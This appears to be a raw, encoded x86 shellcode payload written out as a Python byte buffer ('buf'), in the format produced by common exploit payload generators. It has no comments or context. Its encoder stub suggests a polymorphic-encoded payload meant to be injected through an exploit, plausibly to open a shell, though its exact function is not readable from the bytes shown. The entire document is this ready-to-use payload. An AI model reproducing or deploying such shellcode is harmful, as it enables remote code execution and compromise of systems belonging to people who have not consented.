buf =  b""
buf += b"\xda\xc0\xd9\x74\x24\xf4\x5d\x29\xc9\xba\x69\xf3"
buf += b"\x74\x2c\xb1\x52\x31\x55\x19\x03\x55\x19\x83\xed"
buf += b"\xfc\x8b\x06\x88\xc4\xc4\xe9\x71\x15\xba\x60\x94"
buf += b"\x24\xe8\x17\xdc\x15\x3c\x53\xb0\x95\xb7\x31\x21"
buf += b"\xa9\x70\xff\x6f\x84\x81\x8b\x02\xce\x4c\x4c\x4e"
buf += b"\x32\xcf\x30\x8d\x67\x2f\x08\x5e\x7a\x2e\x4d\x28"
buf += b"\xf0\xdf\x03\x20\xa8\x0f\xf3\xbd\x0f\x13\xfa\x11"
buf += b"\x04\x2b\x84\x14\xdb\xdf\x38\x16\x0c\x94\x99\x38"
buf += b"\xfc\xab\xca\xb2\xb4\xb3\x69\x0d\x30\xff\x40\x71"
buf += b"\xf0\x74\x96\x06\x02\x5c\xe6\xd8\xa9\xa1\xc6\xd4"
buf += b"\xb0\xe6\xe1\x06\xc7\x1c\x12\xba\xd0\xe7\x68\x60"
buf += b"\x54\xf7\xcb\xe3\xce\xd3\xea\x20\x88\x90\xe1\x8d"
buf += b"\xde\xfe\xe5\x10\x32\x75\x11\x98\xb5\x59\x93\xda"
buf += b"\x91\x7d\xff\xb9\xb8\x24\xa5\x6c\xc4\x36\x01\xd0"
buf += b"\x60\x3d\xa0\x07\x14\xbe\x3a\x28\x48\x28\xf6\xe5"
buf += b"\x73\xa8\x90\x7e\x07\x9a\x3f\xd5\x8f\x96\xc8\xf3"
buf += b"\x48\xd9\xe2\x44\xc6\x24\x0d\xb5\xce\xe2\x59\xe5"
buf += b"\x78\xc3\xe1\x6e\x79\xec\x37\x1a\x72\x4b\xe8\x39"
buf += b"\x79\x01\x09\xd4\x80\xbd\xe3\x27\x5a\xdd\x0b\xe2"
buf += b"\xf3\x75\xf6\x0d\xdb\x8a\x7f\xeb\x49\x84\x29\xa3"
buf += b"\xe5\x66\x0e\x7c\x91\x99\x64\x06\x9d\x6a\x02\x51"
buf += b"\x1e\x74\x0c\x35\x76\xc3\xe5\x81\x79\xd4\x23\xa6"
buf += b"\xed\x5e\x20\x72\x0f\x61\x6d\xd2\x58\xf5\xfb\xb3"
buf += b"\x2b\x64\xfb\x99\xde\x66\x69\x26\x49\x31\x05\x24"
buf += b"\xac\x75\x8a\xd7\x9b\x06\xcd\x28\x5a\x25\xa5\x1f"
buf += b"\xc8\x75\xd1\x5f\x1c\x75\x21\x36\x76\x75\x49\xee"
buf += b"\x22\x26\x6c\xf1\xfe\x5b\x3d\x64\x01\x0d\x91\x2f"
buf += b"\x69\xb3\xcc\x18\x36\x4c\x3b\x1b\x31\xb2\xba\x1b"
buf += b"\xc3\x71\x6b\xe2\xb6\x9c\xaf\x51\xc8\xeb\x92\xf0"
buf += b"\x43\x13\x80\x03\x46"
